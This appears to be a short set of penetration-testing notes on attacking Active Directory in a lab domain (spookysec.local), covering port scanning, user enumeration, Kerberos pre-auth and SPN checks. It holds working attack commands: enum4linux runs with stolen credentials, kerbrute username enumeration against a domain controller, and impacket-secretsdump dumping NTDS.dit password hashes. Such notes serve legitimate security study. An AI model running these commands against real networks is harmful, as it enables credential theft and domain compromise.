Determine what ports are open
Determine open ports
Scan ports with Nmap to fingerprint
Enumerate AD information
Get list of users
If list not available, bruteforce usernames
Determine if kerberos pre-auth exists
Determine which users have SPNs (Service Principle Names)
Used to enumerate a huge amount of AD information from the command line.
enum4linux -a 10.1.1.10 # Attempts to enumerate everything at targetenum4linux -u administrator -p password -U 10.1.1.10 # Use stolen creds to enumerate all usersenum4linux -S 10.1.1.10 # Attempt to gather SMB shares
Used to enumerate information about system over RPC
Kerbrute, used to run various kerberos attacks. Written in Go. https://github.com/ropnop/kerbrute
./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt
Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hash to crack. We must find all accounts in AD which have a SPN (Service Principle Name), then request RC4 tickets from the DC.
Used to extract hashes from a server. Below command will get NTDS.dit, assuming that you have an account with those permissions.
impacket-secretsdump -just-dc backup:[email protected]